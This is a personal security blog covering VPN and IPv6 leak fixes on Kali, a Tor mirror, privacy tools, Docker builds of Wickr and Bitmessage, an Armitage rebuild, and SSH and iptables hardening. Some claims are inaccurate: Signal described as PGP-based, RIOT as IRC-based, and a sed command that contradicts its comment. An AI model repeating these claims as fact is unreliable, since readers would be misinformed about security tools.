c0d3 :: j0rg3

A collection of tips, tricks and snips. A proud Blosxom weblog. All code. No cruft.

Tue, 07 Mar 2017

Privacy Part II: VPN/IPVanish - Install IPVanish on Kali Linux

Okay, so you’re running Whonix, Tails or, at least, TorBrowser.

What’s next? You may wish to consider using a VPN. In simple terms, it’s somewhat similar to what Tor offers. That is: you connect to the VPN and your connection passes through them such that the site that you are visiting will see the VPN’s IP address rather than yours. Of course, that means that you can chain them.

That is: (You)->VPN->Tor->Exit node->Web site

The reason that you might feel compelled to take this step is that a party which is able to see your traffic into and out of Tor could still identify you. The thinking is that the parties who wish to interfere with your privacy could be compelled to run Tor bridges, relays and exit nodes. If traffic from your IP address could be matched to requests coming from the Tor exit node then you could, effectively, be identified.

Some people hold that using a VPN to access Tor does not improve your anonymousness. I am not among them. In particular, you will find that IPVanish offers VPN service for under $7 per month and is popular among users of the Tor network. Which means that in addition to the fact that IPVanish is not logging your traffic, there’s an excellent chance that other users are going from IPVanish into Tor, helping to reduce the uniqueness of your traffic.

By the way, I’d suggest poking around the web a little bit. While their prices are already great you can find some even deeper discounts: https://signup.ipvanish.com/?aff=vpnfan-promo

IPVanish’s site offers instructions for installing the VPN in Ubuntu so we’re going to take a look at using IPVanish in Kali — including an interesting and unanticipated snag (and, of course, how to fix it).

Let’s grab the OpenVPN configuration:
wget http://www.ipvanish.com/software/configs/ca.ipvanish.com.crt; wget http://www.ipvanish.com/software/configs/ipvanish-US-New-York-nyc-a01.ovpn

We will need the OpenVPN package for Gnome:
apt install network-manager-openvpn-gnome

Click on the tray in the upper right corner, then the wrench/screwdriver icon:

Select the ‘Network’ folder icon:

We’re choosing ‘Wired’ (even though we’re using wlan0 interface):

We’re setting up a VPN, of course:

Import from file:

Choose the configuration file that we downloaded previously:

Enter ‘User name’ and ‘Password’:

We are connected!

Verified at IPVanish’s site: https://www.ipvanish.com/checkIP.php

And this is where I had anticipated the installation instructions would end.

I just wanted to check a few more things. And I would love to tell you that it was simply my thoroughness and unbridled CLI-fu that led to discover that I was still making ipv6 connections outside of the VPN. Seems that it wasn’t noticed by the test at IPVanish because they deal only in ipv4. I was able to prove my ipv6 address and geolocation by using: http://whatismyipaddress.com/

Further, we can establish that the test at IPVanish is not ipv6-compatible with a quick test.

The easy fix here is to disable ipv6 locally. It is plausible that this could cause unintended consequences and, to be thorough, it would be best to handle your VPN at the firewall. Having support for OpenVPN, you’ll be able to get this running with a huge variety of routing/firewall solutions. You can grab any number of tiny computers and build a professional-quality firewall solution with something like pfSense. Maybe we’ll take a look at getting that configured in a future post.

But, for now, let’s shut down ipv6 in a way that doesn’t involve any grandiose hand-waving magic (i.e., unexplained commands which probably should work) and then test to get confidence in our results.

Let’s use sysctl to find our ipv6 kernel bits and turn them off. Then we’ll load our configuration changes. As a safety, it wouldn’t be a bad idea to look in /etc/sysctl.conf to verify that there aren’t any ipv6 configs in there.

We’ll back up our config file then turn off everything ipv6 by listing everything with the words ‘ipv6’ and ‘disable’:
cp /etc/sysctl.conf /etc/$(date +%Y-%m-%d.%H-%M-%S).sysctl.conf.bak && \
sysctl -a | grep -i ipv6 | grep disable | sed 's/0/1/g' >> /etc/sysctl.conf && \
sysctl -p

To explain what we’re doing:
List all kernel flags; show uonly those containing the string ‘ipv6’; of those that remain, show only those that contain the string ‘disable’:
sysctl -a | grep -i ipv6 | grep disable
Replace the 0 values with 1, to turn ON the disabling, by piping output to:
sed 's/0/1/g'
That all gets stuck on the end of ‘sysctl.conf’ by redirecting stdout to append to the end of that file:
>> /etc/sysctl.conf
Then we reload with:
sysctl -p

Then as a final sanity-check we’ll make sure we can’t find any ipv6 packets sneaking about:
tcpdump -t -n -i wlan0 -s 256 -vv ip6

At this point, assuming our tcpdump doesn’t show any traffic, we should be ipv6-free with all of our ipv4 traffic shipped-off nicely through IPVanish!

Tags: , , , , , , , , , , , , ,
Permalink: 20170307.privacy.vpn.ipvanish

Sat, 04 Mar 2017

Official(ish) deep dark onion code::j0rg3 mirror

Recently I decided that I wanted my blog to be available inside of the Deep, Dark Onion (Tor).

First time around, I set up a proxy that I modified to access only the clear web version of the blog and to avail that inside Tor as a ‘hidden service’.

My blog is hosted on equipment provided by the kind folk at insomnia247.nl and I found that, within a week or so, the address of my proxy was blocked. It’s safe for us to assume that it was simply because of the outrageous popularity it received inside Tor.

By “safe for us to assume” I mean that it is highly probable that no significant harm would come from making that assumption. It would not be a correct assumption, though.

What’s more true is that within Tor things are pretty durn anonymous. Your logs will show Tor traffic coming from only. This is a great situation for parties that would like to scan sites repeatedly looking for vulnerabilities — because you can’t block them. They can scan your site over and over and over. And the more features you have (e.g., comments, searches, any form of user input), the more attack vectors are plausible.

So why not scan endlessly? They do. Every minute of every hour.

Since insomnia247 is a provider of free shells, it is incredibly reasonable that they don’t want to take the hit for that volume of traffic. They’re providing this service to untold numbers of other users, blogs and projects.

For that reason, I decided to set up a dedicated mirror.

Works like this: my blog lives here. I have a machine at home which uses rsync to make a local copy of this blog. Immediately thereafter it rsyncs any newly gotten data up to the mirror in onionland.

After consideration, I realized that this was also a better choice just in case there is something exploitable in my blog. Instead of even risking the possibility that an attacker could get access to insomnia247, they can only get to my completely disposable VPS which has hardly anything on it except this blog and a few scripts to which I’ve already opened the source code.

I’ve not finished combing through but I’ve taken efforts to ensure it doesn’t link back to clear web. To be clear, there’s nothing inherently wrong with that. Tor users will only appear as the IP address of their exit node and should still remain anonymous. To me, it’s just onion etiquette. You let the end-user decide when they want to step outside.

To that end, the Tor mirror does not have the buttons to share to Facebook, Twitter, LinkedIn, Google Plus.

That being said, if you’re a lurker of those Internet back-alleys then you can find the mirror at: http://aacnshdurq6ihmcs.onion

Happy hacking, friends!

Tags: , , , , , , , , , , ,
Permalink: 20170304.deep.dark.onion

Sun, 19 Feb 2017

Privacy: perspective and primer.

Hello friends.

While the overall telos of this blog is to, generally speaking, convey code snippets and inspire the personal projects of others, today we’re going to do something a smidgeon different.

This will be a layman’s look at varied dimensions of information security from a comfortable distance. Over the years, I’ve secured servers, operating systems, medical data, networks, communications and I’ve unsecured many of these same things. The topics are too sprawling to be covered in a quick summary — but let’s find a point of entry.

Those of us who are passionate about information security are well aware of how daunting is the situation. For newcomers, it sometimes seems rather impossible. Pick any subject and there are probably well-informed and convincing experts in diametric equidistance from any “happy medium”.

Let’s imagine that (like most of us) you don’t have anything spectacular to protect. However, you dislike the idea of our ever-dissolving privacy. Therefore you want to encrypt communications. Maybe you begin to use Signal. However, there are criticisms that there is a “backdoor” (there is not). Further, there are accusations that open source projects are coded by those who can’t get real jobs. Conversely, open source projects are widely open for peer review. If it worries one enough they are free to review code themselves.

PGP can encrypt content but concerns surround algorithmic selections. Some are worried about metadata crumbs. Of course, there’s nothing preventing the frequent switching of keys and email addresses. You could use BitMessage, any number of chat solutions or drop at paste bins.

Let’s leave those concerns aside for when you’ve figured out what you’re intending to protect. These arguments surround any subject in information security and we’re not going to investigate them on a case by case basis. Least, not in this post.

At the coarsest granularity, the question is analogous to the practicality of locking your doors or sealing your post envelopes. Should I take measures toward privacy?

My opinion is rather predictable: of course you should!

There’s a very pragmatic explanation. If there ever comes a day when you should like to communicate privately, that’s a terrible time to start learning.

Take the easy road and start using some of the myriad tools and services available.

Should you decide to take InfoSec seriously, you’ll need to define a threat model.
That is: What am I protecting? From whom am I protecting? (e.g. what are probable attack vectors?)

That’s where you need to make choices about trusting products, protocols, methods, algorithms, companies, servers, et cet. Those are all exciting subjects to explore but all too often brushing up against them can be exasperating and cause premature burn-out.

That in mind, let’s employ the philosophy that any effort toward security is better than none and take a look at a few points where one might get wetted-toes.

If you have questions or want specific advice, there are several ways below to initiate a secure conversation with me.


Secure your browser:

  • Privacy Badger: Block tracking
  • HTTPS Everywhere: Increase your encryptioning
  • uBlock: Advertisements are for others

    Secure communications:

  • Mailvelope: PGP email encryption for your major webmail provider (e.g., Gmail) | contact | pubkey
  • Tutanota: Encrypted webmail | Kontakt
  • Protonmail: Well-established provider of PGP encrypted webmail, featuring 2FA | kontakta
  • BitMessage: P2P encrypted communications protocol | contact: BM-2D9tDkYEJSTnEkGDKf7xYA5rUj2ihETxVR | Bitmessage channel list
  •   [ Bitmessage in a Docker container ]

  • BitMessage.ch: BitMessage email gateway | contact
  • BitMsg.me: Online BitMessage service
  • Keybase.io: Keybase maps your identity to your public keys, and vice versa
  • Signal: PGP encrypted TXT messages
  • Wire: Encrypted chat, video and calls
  • RIOT: Open-source, IRC-based, Matrix; run your own server
  • Wickr: Encrypted ephemeral chat
  •   [ n.b. Wickr’s .deb package seeks a unicode library (libicu52) which is not available to a recent Kali (or anything) install; .deb file is based on Ubuntu’s 2014 LTS release. Wickr in a Docker container ]


    Explore alternate nets (e.g., Deep Web, Dark Net):

  • MaidSafe: Promising new alt-web project
  • Qubes: a reasonably secure operating system
  • FreeNet: Alt-net based primarily on already knowing with whom you intend to collaborate
  • Bitmask: VPN solution to anonymize your traffic
  • TAILS: A live operating system based on the Tor network
  • TorBrowser: Stand-alone browser for Tor (less secure than TAILS)
  • Whonix: the most secure (and complex) way to access the Tor network
  • i2p: an other approach to creating a secure and private alternate web
  • Morph.is: fun alt-net, aimed at producing The World Brain. Although, it’s future looks a lot less promising since the lead dev was killed.
  • ZeroNet: one more encrypted anonymous net
  • Have fun and compute safely!

    Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
    Permalink: 20170219.privacy.prespective.primer

    Sat, 18 Feb 2017

    The making of a Docker: Part II - Wickr: with bonus analysis

    Recently, I read a rather excited attention-catching piece about how Wickr is the super-secure version of Slack. Attention caught in part because I feel like Wickr has been around for a while. I’d not seen anyone raving about its security in places where I normally interact with those who are highly informed about such subjects.

    Good is that it seems the folk at Wickr did a fine job of making sure valuable data aren’t left behind.
    The bad: closed-source, not subject to independent review; crazy marketin’-fancy-talk without a thorough description of how it does what is claimed.
    Any time I’m looking at a product or service that boasts security, I sort of expect to see a threat model.

    [ Update: At the time I was working on this project, the folk at Wickr were, evidently, opening their source. That’s spectacular news! Check it out on Github. ]

    This began as an exercise to provide another piece of security-ish software in a Docker container. Anyone who has used a live distro (e.g., Kali, TAILS) with any regularity knows the ritual of installing favorite tools at each boot, data stores on removable media.

    For me, there is tremendous appeal in reducing that to something like:
    git clone https://georgeglarson/wickr
    cd docker-wickr

    Let’s dig in!

    Having created a number of Docker containers my workflow is to queue up the base OS and go through the steps needed to get the software running while keeping careful notes. In this case, I had originally tried to install Wickr on a current copy of Kali. It was already known that Wickr, based off of Ubuntu 14.04, needed an older unicode library. So we begin with Ubuntu 14.04.

    Grab a copy of Wickr and see what’s required:
    dpkg -I wickr-me_2.6.0_amd64.deb

    new debian package, version 2.0.
    size 78890218 bytes: control archive=4813 bytes.
    558 bytes, 14 lines control
    558 bytes, 14 lines control64
    10808 bytes, 140 lines md5sums
    Package: wickr-me
    Architecture: amd64
    Section: net
    Priority: optional
    Version: 2.6.0-4
    Replaces: wickr
    Conflicts: wickr
    Depends: libsqlcipher0, libuuid1, libicu52, libavutil52|libavutil54, libc6, libssl1.0.0, libx264-142, libglib2.0-0, libpulse0, libxrender1, libgl1-mesa-glx
    Recommends: libnotify-bin, gstreamer-plugins0.10-good, gstreamer-plugins0.10-bad, gstreamer-plugins0.10-ugly
    Maintainer: Wickr Inc.
    Installed-Size: 200000
    Description: Secure Internet Chat and Media Exchange agent
    Wickr is a secure communications client

    Okay. The CLI should do most of the work for us, giving a formatted list of dependencies.
    dpkg -I wickr-me_2.6.0_amd64.deb | grep -E "^ Depends: | Recommends: " | sed -e "s/ Depends: //" -e "s/ Recommends: //" -e "s/,//g" -e "s/ / \\\ \n/g"

    libsqlcipher0 \
    libuuid1 \
    libicu52 \
    libavutil54 \
    libc6 \
    libssl1.0.0 \
    libx264-142 \
    libglib2.0-0 \
    libpulse0 \
    libxrender1 \
    libnotify-bin \
    gstreamer-plugins0.10-good \
    gstreamer-plugins0.10-bad \
    gstreamer-plugins0.10-ugly \

    Attempting to get those with apt-get reports that it cannot find the gstreamer bits.

    Let’s find:
    apt-cache search gstreamer | grep -i plugin | grep -E "good|bad|ugly"

    gstreamer0.10-plugins-good - GStreamer plugins from the "good" set
    gstreamer0.10-plugins-bad - GStreamer plugins from the "bad" set
    gstreamer0.10-plugins-ugly - GStreamer plugins from the "ugly" set

    So, there’s the format we need to get the gstreamer dependencies. We know that we’ll also want SSH and wget. That should be enough for our Dockerfile.

    We’ll pull down Wickr:
    wget https://dls.wickr.com/Downloads/wickr-me_2.6.0_amd64.deb

    Then install:
    dpkg -i wickr-me_2.6.0_amd64.deb

    Okay! We are, in theory, ready to run Wickr. We’re about to see we aren’t yet there — but these sorts of problems are pretty commonplace.

    wickr-me: error while loading shared libraries: libxslt.so.1: cannot open shared object file: No such file or directory

    Huh! We need libxslt. Let’s fix that: apt-get install libxslt1-dev

    Now we can run it.

    This application failed to start because it could not find or load the Qt platform plugin "xcb".

    Available platform plugins are: eglfs, linuxfb, minimal, minimalegl, offscreen, xcb.

    Reinstalling the application may fix this problem.
    Aborted (core dumped)

    One more: apt-get install xcb

    Okay. That really was the last one. Now we have a complete list of dependencies for our Dockerfile:
    RUN apt-get update && apt-get install -y \
    gstreamer0.10-plugins-good \
    gstreamer0.10-plugins-bad \
    gstreamer0.10-plugins-ugly \
    libsqlcipher0 \
    libuuid1 \
    libicu52 \
    libavutil52 \
    libc6 \
    libssl1.0.0 \
    libx264-142 \
    libglib2.0-0 \
    libpulse0 \
    libxrender1 \
    libxslt1-dev \
    libgl1-mesa-glx \
    libnotify-bin \
    ssh \
    wget \
    xcb \
    && apt-get clean \

    We now have Wickr in a Docker container and, because we are the curious sort, need to peek into what’s happening.

    A natural first step is to set Wireshark atop Wickr. At a glance, seems to be communicating with a single IP address ( via HTTPS.

    Unsurprsingly, the client communicates to the server whenever a message is sent. Further it appears to poll the same address periodically asking for new messages. We see that the address resolves to Rackspace in San Antonio, TX.

    We can easily establish the link between this IP address, Rackspace and the application.

    Well, that’s enough. Right?




    We’re still a little curious.

    Aren’t we?

    I mean, what’s the big question here? What happens if there’s a man in the middle? Persons so eagerly connect to any free WIFI, it is clearly a plausible scenario. Well… One way to find out!

    Here’s what we learned. Server-side, the application is written in PHP. The IP address is resolved by the URI ‘secex.info’.

    When we send, it calls ‘postMessage.php’:

    When we receive, ‘downloadMessage.php’:

    And it calls ‘newMessageCheck.php’ to, y’know, check for new messages.

    Other analyses have forensically examined artefacts left behind; there are published descriptions of the encryption methods used for the local database connection. We didn’t go into more aggressive efforts such as disassembly because we are too lazy for that jazz!

    My opinion, we didn’t learn anything wildly unexpected. Overall, Wickr seems an okay solution for convenient encrypted messaging. That’s always the trade: convenience vs. security. Least we ended with a Docker container for the software!

    Github | Docker

    Tags: , , ,
    Permalink: 20170218.making.a.docker.wickr

    Fri, 17 Feb 2017

    The making of a Docker: Part I - Bitmessage GUI with SSH X forwarding

    Lately, I’ve been doing a lot of work from a laptop running Kali. Engaged in pursuit of a new job, I’m brushing up on some old tools and skills, exploring some bits that have changed.

    My primary desktop rig is currently running Arch because I love the fine grain control and the aggressive releases. Over the years, I’ve Gentoo’d and Slacked, Crunchbanged, BSD’d, Solarised, et cet. And I’ve a fondness for all of them, especially the security-minded focus of OpenBSD. But, these days we’re usually on Arch or Kali. Initially, I went with Black Arch on the laptop but I felt the things and ways I was fixing things were too specific to my situation to be good material for posts.

    Anyway, I wanted to get Bitmessage running, corresponding to another post I have in drafts. On Kali, it wasn’t going well so I put it on the Arch box and just ran it over the network. A reasonable solution if you’re in my house but also the sort of solution that will keep a hacker up at night.

    If you’re lucky, there’s someone maintaining a package for the piece of software that you want to run. However, that’s often not the case.

    If I correctly recall, to “fix” the problem with Bitmessage on Kali would’ve required the manual installation an older version of libraries that were already present. Those libraries should, in fact, be all ebony and ivory, living together in harmony. However, I just didn’t love the idea of that solution. I wanted to find an approach that would be useful on a broader scale.

    Enter containerization/virtualization!

    Wanting the lightest solution, I quickly went to Docker and realized something. I have not before built a Docker container for a GUI application. And Bitmessage’s CLI/daemon mode doesn’t provide the fluid UX that I wanted. Well, the easy way to get a GUI out of a Docker container is to forward DISPLAY as an evironment variable (i.e., docker run -e DISPLAY=$DISPLAY). Splendid!

    Except that it doesn’t work on current Kali which is using QT4. There’s a when graphical apps are run as root and though it is fixed in QT5, we are using current Kali. And that means we are, by default, uid 0 and QT4.

    I saw a bunch of workarounds that seemed to have spotty (at best) rates of success including seting QT’s graphics system to Native and giving Xorg over to root. They, mostly, seemed to be cargo cult solutions.

    What made the most sense to my (generally questionable) mind was to use X forwarding. Since I had already been running Bitmessage over X forwarding from my Arch box, I knew it should work just the same.

    To be completely truthful, the first pass I took at this was with Vagrant mostly because it’s SO easy. Bring up your Vagrant Box and then:
    vagrant ssh -- -X

    Having proof of concept, I wanted a Docker container. The reason for this is practical. Vagrant, while completely awesome, has substantially more overhead than Docker by virtualizing the kernel. We don’t want a separate kernel running for each application. Therefore Docker is the better choice for this project.

    Also, we want this whole thing to be seemless. We want to run the command bitmessage and it should fire up with minimal awkwardness and hopefully no extra steps. That is we do not want to run the Docker container then SSH into it and execute Bitmessage as individual steps. Even though that’s going to be how we begin.

    The Bitmessage wiki accurately describes how to install the software so we’ll focus on the SSH setup. Though when we build the Dockerfile we will need to add SSH to the list from the wiki.

    We’re going to want the container to start so that the SSH daemon is ready. Until then we can’t SSH (with X forwarding) into the container. Then we’ll want to use SSH to kick off the Bitmessage application, drawing the graphical interface using our host system’s X11.

    We’re going to take advantage of Docker’s -v --volume option which allows us to specify a directory on our host system to be mounted inside our container. Using this feature, we’ll generate our SSH keys on the host and make them automatically available inside the container. We’ll tuck the keys inside the directory that Bitmessage uses for storing its configuration and data. That way Bitmessage’s configuration and stored messages can be persistent between runs — and all of your pieces are kept in a single place.

    When we generate the container /etc/ssh/sshd_config is configured to allow root login without password only (i.e., using keys). So here’s how we’ll get this done:
    mkdir -p ~/.config/PyBitmessage/keys #Ensure that our data directories exist
    cd ~/.config/PyBitmessage/keys
    ssh-keygen -b 4096 -P "" -C $"$(whoami)@$(hostname)-$(date -I)" -f docker-bitmessage-keys #Generate our SSH keys
    ln -fs docker-bitmessage-keys.pub authorized_keys #for container to see pubkey

    Build our container (sources available at Github and Docker) and we’ll make the script to handle Bitmessage to our preferences. #!/bin/bash
    # filename: bitmessage
    set -euxo pipefail

    # open Docker container:
    # port 8444 available, sharing local directories for SSH and Bitmessage data
    # detatched, interactive, pseudo-tty (-dit)
    # record container ID in $DID (Docker ID)
    DID=$(docker run -p 8444:8444 -v ~/.config/PyBitmessage/:/root/.config/PyBitmessage -v ~/.config/PyBitmessage/keys/:/root/.ssh/ -dit j0rg3/bitmessage-gui bash)

    # find IP address of new container, record in $DIP (Docker IP)
    DIP=$(docker inspect $DID | grep IPAddress | cut -d '"' -f 4)

    # pause for one second to allow container's SSHD to come online
    sleep 1

    # SSH into container and execute Bitmessage
    ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oIdentityFile=~/.config/PyBitmessage/keys/docker-bitmessage-keys -X $DIP ./PyBitmessage/src/bitmessagemain.py

    # close container if Bitmessage is closed
    docker kill $DID

    Okay, let’s make it executable: chmod +x bitmessage

    Put a link to it where it can be picked up system-wide: ln -fs ~/docker-bitmessage/bitmessage /usr/local/bin/bitmessage

    There we have it! We now have a functional Bitmessage inside a Docker container. \o/

    In a future post we’ll look at using eCryptfs to further protect our Bitmessage data stores.

      Project files: Github and Docker

    Tags: , , , , , , , , , , ,
    Permalink: 20170217.making.a.docker.bitmessage

    Tue, 10 Jan 2017

    [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.

    Mucking about with a fresh copy of Kali brings to attention that it’s packaged with an Armitage that doesn’t correctly work.

    I know what you’re thinking… Good. Type the commands into Msfconsole like a real man, y’uh lazy good-fer-naught! And, in practice, that was my immediate solution. But I can’t resist a good tinker when things are misbehaving.

    I was anticipating that the problem would be thoroughly solved when I ixquicked it. That was partially correct. Surprised, however, when apt-get update && apt-get upgrade didn’t fix the issue. More surprised at the age of the issue. Most surprised that I could see lots of evidence that users have been plagued by this issue — but no clear work arounds were quickly found.

    Guess what we’re doing today?

    Okay. The issue is quite minor but just enough to be heartbreaking to the fledgling pentester trying to get a VM off the ground.

    In brief, the owner of Armitage’s Github explains:

    The MSF Scans feature in Armitage parses output from Metasploit’s portscan/tcp module and uses these results to build a list of targets it should run various Metasploit auxiliary modules against. A recent-ish update to the Metasploit Framework changed the format of the portscan/tcp module output. A patch to fix this issue just needs to account for the new format of the portscan/tcp module.

    That is, a colon makes it into the input for the Msfconsole command to define RHOSTS. I.e.: set RHOSTS -

    An other kind coder tweaked the regex and submitted the patch and pull request, which was successfully incorporated into the project.

    Sadly, things have stalled out there. So if this problem is crippling your rig, let’s fix it!

    We just want a fresh copy of the project.
    root@kali:~/armitage# git clone https://github.com/rsmudge/armitage

    Cloning into ‘armitage’…
    remote: Counting objects: 7564, done.
    remote: Total 7564 (delta 0), reused 0 (delta 0), pack-reused 7564
    Receiving objects: 100% (7564/7564), 47.12 MiB | 2.91 MiB/s, done.
    Resolving deltas: 100% (5608/5608), done.

    Kali is Debian-based and we’re going to need Apache Ant:
    root@kali:~/armitage# apt-get install ant

    Then, we’ll build our new fella:
    root@kali:~/armitage# cd armitage
    root@kali:~/armitage# ./package.sh

    Buildfile: /root/test/armitage/build.xml


    Total time: 0 seconds
    Buildfile: /root/test/armitage/build.xml

    [mkdir] Created dir: /root/test/armitage/bin

    [javac] Compiling 111 source files to /root/test/armitage/bin
    [javac] depend attribute is not supported by the modern compiler
    [javac] Note: /root/test/armitage/src/ui/MultiFrame.java uses or overrides a deprecated API.
    [javac] Note: Recompile with -Xlint:deprecation for details.
    [javac] Note: Some input files use unchecked or unsafe operations.
    [javac] Note: Recompile with -Xlint:unchecked for details.

    Total time: 2 seconds
    Buildfile: /root/test/armitage/build.xml



    [unzip] Expanding: /root/test/armitage/lib/sleep.jar into /root/test/armitage/bin
    [unzip] Expanding: /root/test/armitage/lib/jgraphx.jar into /root/test/armitage/bin
    [unzip] Expanding: /root/test/armitage/lib/msgpack-0.6.12-devel.jar into /root/test/armitage/bin
    [unzip] Expanding: /root/test/armitage/lib/postgresql-9.1-901.jdbc4.jar into /root/test/armitage/bin
    [unzip] Expanding: /root/test/armitage/lib/javassist-3.15.0-GA.jar into /root/test/armitage/bin
    [copy] Copying 4 files to /root/test/armitage/bin/scripts-cortana
    [jar] Building jar: /root/test/armitage/armitage.jar
    [jar] Building jar: /root/test/armitage/cortana.jar

    Total time: 1 second
    adding: readme.txt (deflated 55%)
    adding: armitage.exe (deflated 49%)
    adding: cortana.jar (deflated 5%)
    adding: armitage.jar (deflated 5%)
    adding: whatsnew.txt (deflated 65%)
    Archive: ../../armitage.zip
    inflating: readme.txt
    inflating: armitage.exe
    inflating: cortana.jar
    inflating: armitage.jar
    inflating: whatsnew.txt

    And here, best I can guess from messages read, is where a lot of people are running into trouble. We have successfully produced our new working copy of armitage. However, it is in our own local directory and will not be run if we just enter the command: armitage

    Let’s review how to figure out what we want to do about that.

    First, we want to verify what happens when we run the command armitage.
    root@kali:~/armitage# which armitage


    Good! Let’s check and see what that does!
    root@kali:~/armitage# head /usr/bin/armitage


    cd /usr/share/armitage/
    exec ./armitage “$@”

    Almost there! It’s running /usr/share/armitage/armitage with whatever variables we’ve passed in. We’ll check that out.
    root@kali:~/armitage# head /usr/share/armitage/armitage

    java -XX:+AggressiveHeap -XX:+UseParallelGC -jar armitage.jar $@

    We have enough information to assemble a solution.

    I trust that the people behind Kali and Armitage will get this corrected so I don’t want to suggest a solution that would replace the armitage command and prevent an updated version from running later. So, let’s just make a temporary replacement?

    root@kali:~/armitage# echo -e '#!/bin/sh\njava -XX:+AggressiveHeap -XX:+UseParallelGC -jar ~/armitage/armitage.jar $@' > /usr/bin/tmparmitage

    Hereafter, we can use the command ‘tmparmitage’ (either CLI or ALT-F2) to run our fresh version until things catch up.

    And, of course, to save you the time, weary hacker:

    Download here:

    Tags: , , , , , , ,
    Permalink: 20170110.armitage.not.working.in.kali

    Mon, 02 Jan 2017

    Securing a new server

    Happy new year! New year means new servers, right?

    That provides its own set of interesting circumstances!

    The server we’re investigating in this scenario was chosen for being a dedicated box in a country that has quite tight privacy laws. And it was a great deal offered on LEB.

    So herein is the fascinating bit. The rig took a few days for the provider to set up and, upon completion, the password for SSHing into the root account was emailed out. (o_0)

    In very security-minded considerations, that means that there was a window of opportunity for bad guys to work on guessing the password before its owner even tuned in. That window remains open until the server is better secured. Luckily, there was a nice interface for reinstalling the OS permitting its purchaser to select a password.

    My preferred approach was to script the basic lock-down so that we can reinstall the base OS and immediately start closing gaps.

    In order:

  • Set up SSH keys (scripted)
  • Disable password usage for root (scripted)
  • Install and configure IPset (scripted. details in next post)
  • Install and configure fail2ban
  • Install and configure PortSentry

  • In this post, we’re focused on the first two steps.

    The tasks to be handled are:

  • Generate keys
  • Configure local SSH to use key
  • Transmit key to target server
  • Disable usage of password for ‘root’ account

  • We’ll use ssh-keygen to generate a key — and stick with RSA for ease. If you’d prefer ECC then you’re probably reading the wrong blog but feel encouraged to contact me privately.

    The code:

    #configure variables
    remote_pass="thisisaratheraquitecomplicatedpasswordbatterystaple" # https://xkcd.com/936/
    local_date=`date -I`

    #generate key without passphrase
    ssh-keygen -b 4096 -P "" -C $local_user@local_host-$local_date -f $local_filename

    #add reference to generated key to local configuration
    printf '%s\n' "Host $remote_host" "IdentityFile $local_filename" >> ~/.ssh/config

    #copy key to remote host
    sshpass -p $remote_pass ssh-copy-id $remote_user@$remote_host

    #disable password for root on remote
    ssh $remote_user@$remote_host "cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak && sed -i '0,/RE/s/PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config"

    We just run this script soon as the OS is reinstalled and we’re substantially safer. As a Deb8 install, quickly pulling down fail2ban and PortSentry makes things quite a lot tighter.

    In another post, we’ll visit the 2017 version of making a DIY script to batten the hatches using a variety of publicly provided blocklists.

    Download here:

    Tags: , , , ,
    Permalink: 20170102.securing.a.new.server

    Tue, 20 Dec 2016

    Kicking the Crypto-tires

    Some time ago I had begun work on my own Pastebin-type project with a few goals. Basically, I wanted to eat all the cakes — and have them too.

  • Both an online user interface and efficient CLI usage
  • Messages encrypted immediately such that database access does not provide one with the contents of the messages
  • Messages capable of self-destructing
  • Database schema that would allow rebuilding the user/message relationship, provided the same password but would not store those relationships
  • Also, JavaScript encryption to appeal to users who don’t know much about cryptography but would like to try
  • The project, honestly, was going swimmingly when derailed by the goings-on of life.

    One of the interesting components of the project was, of course, choosing crypto implementations. There are know shortcomings to handling it in JS but that’s still the most convenient for some users. Outside of the browser, server-side, you had all the same questions about which solution was best. Which protocol(s) should be available?

    Well, I’ve just learned about a project which I would have loved to have available back then. Project Wycheproof can help you test your crypto solutions against known problems and attacks. Featuring 80 tests probing at 40 known bugs, here’s a snip from the introduction:

    Project Wycheproof has tests for the most popular crypto algorithms, including

  • DH
  • DSA
  • ECDH
  • RSA
  • The tests detect whether a library is vulnerable to many attacks, including

  • Invalid curve attacks
  • Biased nonces in digital signature schemes
  • Of course, all Bleichenbacher’s attacks
  • And many more — we have over 80 test cases
  • Interesting stuff with exciting potential!

    Tags: , ,
    Permalink: 20161220.kicking.the.crypto.tires

    Sun, 13 Jul 2014

    Simple Protection with iptables, ipset and Blacklists

    Seems I’ve always just a few more things going on than I can comfortably handle. One of those is an innocent little server holding the beginnings of a new project.

    If you expose a server to the Internet, very quickly your ports are getting scanned and tested. If you’ve an SSH server, there are going to be attempts to login as ‘root’ which is why it is ubiquitously advised that you disable root login. Also why many advise against allowing passwords at all.

    We could talk for days about improvements; it’s usually not difficult to introduce some form of two-factor authentication (2FA) for sensitive points of entry such as SSH. You can install monitoring software like Logwatch which can summarize important points from your logs, such as: who has logged via SSH, how many times root was used, etc.

    DenyHosts and Fail2ban are very great ways to secure things, according to your needs.

    DenyHosts works primarily with SSH and asks very little from you in way of configuration, especially if you’re using a package manager to install a version that is configured for the distribution on which you’re working. If you’re installing from source you may need to find where are your SSH logs (e.g., /var/log/secure, /var/log/auth.log). It’s extremely easy to set up DenyHosts to synchronize so that you’re automatically blocking widely-known offenders whether or not they’re after your server.

    In contrast, Fail2ban is going to take more work to get set up. However, it is extremely configurable and works with any log file you point it toward which means that it can watch anything (e.g., FTP, web traffic, mail traffic). You define your own jails which means you can ban problematic IP addresses according to preference. Ban bad HTTP attempts from HTTP only or stick their noses in the virtual corner and don’t accept any traffic from them until they’ve served their time-out by completely disallowing their traffic. You can even use Fail2ban to scan its own logs, so repeating offenders can be locked out for longer.

    Today we’re going to assume that you’ve a new server that shouldn’t be seeing any traffic except from you and any others involved in the project. In that case, you probably want to block traffic pretty aggressively. If you’ve physical access to the server (or the ability to work with staff at the datacenter) then it’s better to err in the direction of accidentally blocking good guys than trying to be overly fault-tolerant.

    The server we’re working on today is a Debian Wheezy system. It has become a common misconception that Ubuntu and Debian are, intents and purposes, interchangeable. They’re similar in many respects and Ubuntu is great preparation for using Debian but they are not the same. The differences, I think, won’t matter for this exercise but I am unsure because this was written using Wheezy.

    Several minutes after bringing my new server online, I started seeing noise in the logs. I was still getting set up and really didn’t want to stop and take protective measures but there’s no point in securing a server after its been compromised. The default Fail2ban configuration was too forgiving for my use. It was scanning for 10 minutes and banning for 10 minutes. Since only a few people should be accessing this server, there’s no reason for anyone to be trying a different password every 15 minutes (for hours).

    I found a ‘close-enough’ script and modified it. Here, we’ll deal with a simplified version.

    First, lets create a name for these ne’er-do-wells in iptables:
    iptables -N bad_traffic

